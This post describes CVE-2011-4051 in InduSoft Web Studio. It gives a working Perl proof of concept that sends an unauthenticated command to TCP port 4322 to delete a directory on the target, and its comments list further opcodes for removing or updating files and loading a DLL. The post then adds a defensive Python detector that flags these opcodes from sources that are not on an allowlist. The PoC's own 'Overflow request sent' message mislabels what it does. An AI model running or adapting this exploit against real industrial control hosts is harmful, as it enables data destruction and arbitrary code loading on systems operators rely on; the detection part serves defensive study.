InduSoft Web Studio 6.1 and 7.0 allow unauthenticated users to run commands such as deleting or creating files and folders and loading a DLL.
The vulnerability was discovered by Luigi Auriemma.
Here is a simple PoC for this vulnerability:
#PoC for CVE-2011-4051
#The CEServer module in InduSoft Web Studio 6.1 and 7.0 allows an unauthenticated user to run commands.
#These are: remove file/directory, send/update file, start/stop runtime project
#and load a DLL into the WebStudio process.
#Modify the script to suit your needs.
#Vulnerability discovered by Luigi Auriemma
use IO::Socket::INET;
$host = "192.168.138.128";
$port = 4322;
$sock = IO::Socket::INET->new( PeerAddr => $host,
                               PeerPort => $port,
                               Proto => 'tcp') || die "Unable to create socket";
$start = "\x07";
$rmvfile = "\x15";
$rmvdir = "\x10";
$dlltag = "\x31";
#0x10 remove directory
#0x15 remove file
#0x01 update a file
#0x08 stop softplc runtime project
#0x07 start softplc runtime project
#0x31 run/load DLL
$data = "C:\\Python24";
$removedir = $rmvdir.$data;
print $sock $removedir;
print "\nOverflow request sent....";
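A defender-side check for the same protocol, as an added example that is not part of the original PoC: it maps the first byte of a client payload sent to TCP port 4322 to the command table in the PoC's comments and reports commands from sources outside an allowlist. The record layout, the allowlist, the severity split and the sample records are assumptions constructed for illustration.

```python
CESERVER_PORT = 4322  # port used by the PoC above

# Command bytes copied from the PoC's comments.
OPCODES = {
    0x01: "update file",
    0x07: "start runtime project",
    0x08: "stop runtime project",
    0x10: "remove directory",
    0x15: "remove file",
    0x31: "load DLL",
}
# Assumption: file-changing commands and DLL loading are rated "high".
HIGH_RISK = {0x01, 0x10, 0x15, 0x31}

def classify(payload: bytes):
    """Return (command name, argument) for a client payload, or None if unknown."""
    if not payload or payload[0] not in OPCODES:
        return None
    # Layout taken from the PoC: one command byte followed by the path.
    arg = payload[1:].rstrip(b"\x00").decode("latin-1")
    return OPCODES[payload[0]], arg

def triage(records, allowed_sources):
    """Report CEServer commands sent by hosts that are not on the allowlist."""
    alerts = []
    for rec in records:
        if rec["dport"] != CESERVER_PORT or rec["src"] in allowed_sources:
            continue
        hit = classify(rec["payload"])
        if hit is None:
            continue
        severity = "high" if rec["payload"][0] in HIGH_RISK else "medium"
        alerts.append({"src": rec["src"], "command": hit[0],
                       "argument": hit[1], "severity": severity})
    return alerts

# Constructed sample records (documentation addresses), not captured traffic.
SAMPLE = [
    {"src": "192.0.2.10", "dport": 4322, "payload": b"\x10C:\\Python24"},
    {"src": "192.0.2.10", "dport": 4322, "payload": b"\x07"},
    {"src": "198.51.100.5", "dport": 4322, "payload": b"\x15C:\\temp\\a.txt"},
    {"src": "192.0.2.10", "dport": 80, "payload": b"\x10GET"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE, allowed_sources={"198.51.100.5"}):
        print(alert)
```

Because the service performs no authentication, the allowlist of engineering workstations is the only thing that separates expected commands from hostile ones in this check.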